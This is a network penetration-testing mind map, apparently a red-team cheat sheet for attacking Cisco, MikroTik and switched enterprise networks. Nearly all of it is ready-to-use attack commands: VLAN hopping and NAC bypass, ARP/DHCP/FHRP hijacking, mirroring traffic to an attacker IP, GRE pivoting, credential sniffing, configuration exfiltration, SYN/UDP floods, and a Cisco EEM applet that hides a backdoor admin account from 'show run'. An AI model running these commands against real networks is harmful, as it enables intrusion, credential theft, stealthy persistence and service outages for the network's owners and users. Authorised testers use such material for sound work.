Network Pentesting Mind Map - v1.
by Caster (https://github.com/c4s73r)

Prologue:
  Powerful hardware
    • CPU: 4 Cores or more
    • RAM: 6 GB or more
    • Interface: Full Duplex, 1Gb/s or more
  Enable Forwarding
    sudo sysctl -w net.ipv4.ip_forward=1
  Check your FW
    sudo iptables -L
    sudo iptables -t nat -L
    sudo iptables -t raw -L
    sudo iptables -t mangle -L
  Enable Masquerading (for capturing incoming & out traffic)
    sudo iptables -t nat -A POSTROUTING -o ethX -j MASQUERADE
  Promisc mode
    sudo ip link set ethX promisc on
  NAT Helper
    sudo modprobe nf_conntrack
    sudo echo "1" > /proc/sys/net/netfilter/nf_conntrack_helper
  Disable ICMP Redirect on your host
    sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
    sudo sysctl -w net.ipv6.conf.all.accept_redirects=0
  TTL Shifting (for traceroute evasion)
    iptables -t mangle -A PREROUTING -i ethX -j TTL --ttl-inc 1

Information Gathering:
  Traffic Sniffing
  CDP/LLDP/MNDP/EDP
    IP Addressing information
    OS version, hardware model
    Port ID, VLAN ID, Native VLAN, Capabilities, MGMT, Duplex
  Above Scanner by Caster: Finding vulnerabilities in network protocols (L2/L3)
    sudo python3 Above.py --interface ethX --timeout XX --fullscan
  SNMP RO Bruteforce: onesixtyone
  Enumerate information: snmp_enum MSF Module, snmpwalk
  Enumerate VLAN ID from STP or PVST+ frame (Bridge System Extension header)
  Analyze Cisco configuration with CCAT and look for credentials, hashes, etc.
  ARP
    Active ARP Scan: netdiscover -i ethX
    Passive ARP Scan: netdiscover -i ethX -p
  TTL Enumeration
    Windows: TTL=128
    Linux: TTL=64
    Cisco: TTL=255
    Juniper: TTL=64

Cisco Passwords:
  Type 0 (Cleartext Password)
  Type 4 (SHA-256) - Crack with: john (--format=Raw-SHA256), hashcat (-m 5700)
  Type 5 (MD5) - Crack with: john (--format=md5crypt), hashcat (-m 500)
  Type 7 (Vigenere Cipher) - ciscot7
  Type 8 (PBKDF2-HMAC-SHA256) - Crack with: john (--format=pbkdf2-hmac-sha256), hashcat (-m 9200)
  Type 9 (SCRYPT) - Crack with: john (--format=scrypt), hashcat (-m 9300)

Authentication Cracking:
  OSPF: Save traffic to .pcap, ettercap -Tqr dump.pcap, Bruteforce with John
  EIGRP: Save traffic to .pcap, eigrp2john.py dump.pcap, Bruteforce with John
  HSRP: Save traffic to .pcap, hsrp2john.py dump.pcap, Bruteforce with John
  VRRP: Save traffic to .pcap, vrrp2john.py dump.pcap, Bruteforce with John
  GLBP: Save traffic to .pcap, glbp2john.py dump.pcap, Bruteforce with John
  TACACS+: Sniff & capture TACACS+ key with Loki tool, Bruteforce TACACS+ key with Loki

NAC/802.1X Bypassing:
  Bridge-based Attack: FENRIR, NAC Bypass toolkit
  SilentBridge with custom hardware
  Evil Twin
  MAC Authentication Bypass: Find some legitimate device in the room. Setting the MAC address of a legitimate device on your interface.

VLAN Bypassing:
  DTP Injection: Yersinia, Scapy
    After DTP Inject:
      sudo modprobe 8021q
      sudo vconfig add ethX <target VLAN ID>
      sudo ip link set ethX.<VLAN ID> up
      sudo dhclient -v ethX.<VLAN ID>
  CDP Injection (VoIP VLAN Context)
    sudo tcpdump -s 0 -w cdp-vlan-bypass.pcap -c 1 -ni eth0 ether host 01:00:0c:cc:cc:cc
    sudo tcpdump -vr cdp-vlan-bypass.pcap (checking CDP frame)
    sudo watch -n 60 "tcpreplay -i eth0 cdp-packet.cap" (inject CDP frame every 60 sec)
    sudo modprobe 8021q
    sudo vconfig add ethX <VLAN ID>
    sudo ip link set ethX.<VLAN ID>
    sudo dhclient -v ethX.<VLAN ID>
  Double Tagging: Scapy (ONE-WAY ATTACK!!! EXPERIMENTAL!!!)

Access to Switch & MITM Attacks:
  After this - create virtual VLAN interfaces, configure 802.1q trunk
    sudo modprobe 8021q
    sudo vconfig add ethX <VLAN ID>
    sudo ip link set ethX.<VLAN ID> up
    sudo dhclient -v ethX.<VLAN ID>

Traffic Hijacking:
  Traffic Interception with Cisco ERSPAN (If necessary, configure the GRE tunnel)
    CSR(config)#monitor session 337 type erspan-source
    CSR(config-mon-erspan-src)#source interface gigabitEthernet 2
    CSR(config-mon-erspan-src)#no shutdown
    CSR(config-mon-erspan-src)#destination
    CSR(config-mon-erspan-src-dst)#erspan-id 337
    CSR(config-mon-erspan-src-dst)#ip address <Attacker IP>
    CSR(config-mon-erspan-src-dst)#origin ip address <source ERSPAN device IP>
  Traffic Interception with Mikrotik TZSP
    [admin@EdgeGW] > /tool sniffer
    [admin@EdgeGW] /tool sniffer> set streaming-enabled=yes \
      streaming-server=<Attacker IP> filter-interface=etherX,etherX \
      filter-stream=yes
    [admin@EdgeGW] /tool sniffer> start

GRE Pivoting:
  L3 GRE through Cisco IOS
    Attacker Side:
      sudo modprobe ip_gre
      sudo ip link add name evilgre type gre local <Attacker IP> remote <Victim IP>
      sudo ip addr add 172.16.0.1/24 dev evilgre
      sudo ip link set evilgre up
    Cisco IOS:
      EdgeGW(config)#interface tunnel 1
      EdgeGW(config-if)#tunnel mode gre ip
      EdgeGW(config-if)#ip address 172.16.0.2 255.255.255.0
      EdgeGW(config-if)#tunnel source <Victim IP>
      EdgeGW(config-if)#tunnel destination <Attacker IP>
  L3 GRE through RouterOS
    Attacker Side:
      sudo modprobe ip_gre
      sudo ip link add name evilgre type gre local <Attacker IP> remote <Victim IP>
      sudo ip addr add 172.16.0.1/24 dev evilgre
      sudo ip link set evilgre up
    RouterOS:
      [admin@EdgeGW] /interface gre> add name=gre_pivoting remote-address=<Attacker IP> allow-fast-path=no
      [admin@EdgeGW] /interface address> add address=172.16.0.2 netmask=255.255.255.0 interface=gre_pivoting
  MTU Fixing
    Cisco IOS:
      PWNED(config)#interface tunnel X
      PWNED(config-if)#ip mtu 1514
    RouterOS:
      [admin@EdgeGW] /interface gre> set mtu=1514 name=gre_pivoting
  L2 GRE Tunnel through L3 GRE Tunnel (Access to L2 Attacks)
    Attacker Side:
      sudo modprobe ip_gre
      sudo ip link add name evilgretap type gre local <Attacker IP> remote <Victim IP>
      sudo ip link set evilgretap up
      sudo dhclient -v evilgretap
    Victim Side (the case when the victim has two interfaces. Be careful):
      sudo modprobe ip_gre
      sudo ip link add name eviltap type gre local <Victim IP> remote <Attacker IP>
      sudo brctl addbr internal
      sudo brctl addif internal eviltap
      sudo brctl addif internal eth1
      sudo ip link set internal up
      sudo sysctl -w net.ipv4.ip_forward=1

Cisco EEM for hiding user:
  Owned(config)#username hidden_grimoire privilege 15 secret <Password>
  Owned(config)#event manager applet hide_from_showrun
  Owned(config-applet)#event cli pattern "show run" sync yes
  Owned(config-applet)#action 0.0 cli command "enable"
  Owned(config-applet)#action 1.0 cli command "show run | exclude hidden | event | action"
  Owned(config-applet)#action 2.0 puts "$_cli_result_showrunapplet"
  It is recommended to write applets for other commands as well (show ssh, show users and other commands)

MITM Attacks:
  ARP Spoofing: Scapy, Loki, Ettercap, Bettercap, Arpspoof
    Checking subnets under attack (the larger the host mask, the higher the DoS risk)
  Dynamic IGP Routing
    Connect to routing domain: FRRouting OSPF
      FRR(config)# ip forwarding
      FRR(config)# router ospf
      FRR(config)# network <Attacker IP/32> area <area ID>
      Analysis of the routing table (when establishing a IGP neighborhood, there is an automatic exchange of route information)
    Connect to AS: FRRouting EIGRP
      FRR(config)# ip forwarding
      FRR(config)# router eigrp <AS Number>
      FRR(config)# network <Attacker IP/32>
      Analysis of the routing table (when establishing a IGP neighborhood, there is an automatic exchange of route information). EIGRP AS is flat, you will list all existing subnets
    DRP Evil Twin: Redistribute static route to IGP AS (OSPF / EIGRP) for capturing user credentials. The goal is usually a service, some kind of service. High risk, do everything quickly! Capture traffic & find
  FHRP Hijacking
    HSRP: Loki / Yersinia / Scapy
      Inject HSRP Packet with MAX priority (255)
      Remove current default route & create new default route through the previous ACTIVE router
      Enable MASQUERADE
      If necessary, crack HSRP authentication with hsrp2john.py
    VRRP: Loki / Yersinia / Scapy
      Inject VRRP Packet with MAX priority (255)
      Remove current default route & create new default route through the previous MASTER router
      Enable MASQUERADE
    GLBP: Loki
      Inject GLBP Packet with MAX priority & MAX GLBP Weight value (255)
      Remove current default route & create new default routes through the previous AVG/AVF router
      Enable MASQUERADE
  DHCP Spoofing
    DHCPv4: Ettercap / Yersinia
    DHCPv6: mitm6 (DNS Spoofing Context. There is a risk of DoS, be careful.)
      sudo mitm6 -d domain.local
  LLMNR/NBNS/mDNS Poisoning: Responder
    sudo responder -I ethX -wrf
  ICMP Redirect Attack: Ettercap / Scapy

DoS:
  CDP Flooding: Yersinia
  OSPF & EIGRP Blackhole Attack: FRR, Nemesis, Scapy
  EIGRP Routing Table Overflow (EIGRPWN Toolkit by Caster)
    sudo python3 routingtableoverflow.py --interface ethX \
      --asn X --src <Attacker IP>
  Fake EIGRP neighbors (EIGRPWN Toolkit by Caster)
    sudo python3 helloflooding.py --interface ethX --asn X --subnet X.X.X.X/X
  Reset EIGRP neighborship (EIGRPWN Toolkit by Caster)
    sudo python3 relationshipnightmare.py --interface ethX \
      --asn X --src <target EIGRP router IP>
  VTP frame Injection: Yersinia
  DHCP Exhaustion Attack: Yersinia, Scapy
  ICMP Smurf: Scapy
  TCP SYN Flood: hping3
    sudo hping3 -c <packet count> -d <bytes> -S -w <TCP window size> \
      -p <target TCP port> --flood --rand-source <target IP>
  UDP Flood: hping3
    sudo hping3 --udp -p <target UDP port> -d <UDP DGRAM size> <target IP>
  ARP Cage Attack (arp_cage.py tool by s0i37)
    sudo python3 arp_cage.py ethX <target subnet> <target IP>
  STP Hijacking ("Grit" toolkit by Caster)
    sudo python3 stpexploit.py --interface ethX --mac XX:XX:XX:XX:XX:XX
  CAM Table Overflow: dsniff / Scapy (NOT RECOMMENDED: Unicast flood risk)

Credentials Sniffing:
  python2 net-creds.py -i ethX
  dsniff -i ethX
  Pcredz -i ethX -v

Configuration Exfiltration:
  Cisco Smart Install Exploiting (SIET toolkit)
    sudo python2 siet.py -g -i <Victim IP>
  SNMP RW against Cisco Router
    Bruteforce SNMP RW String with onesixtyone
    cisco_config_tftp MSF module Configuration:
      set COMMUNITY <RW string>
      set RHOSTS <Target IP>
      set LHOST <Attacker IP>
      set OUTPUTDIR <dir>
      exploit
  SNMP RW String Exfiltration
  Attack some FTP/TFTP Server. They are usually used to store backups of network equipment configurations

GitHub Links:
  Information Gathering: c4s73r/Above, frostbits-security/ccat
  Cisco Passwords: theevilbit/ciscot7
  NAC/802.1X Bypassing: Orange-Cyberdefense/fenrir-ocd, scipag/nac_bypass, s0lst1c3/silentbridge
  Access to Switch & MITM Attacks: c4s73r/Grit
  DoS: s0i37/net/arp_cage.py, c4s73r/EIGRPWN
  Credentials Sniffing: lgandx/PCredz, DanMcInerney/net-creds
  Configuration Exfiltration: Sab0tag3d/SIET

Network Pentesting Mindmap by Caster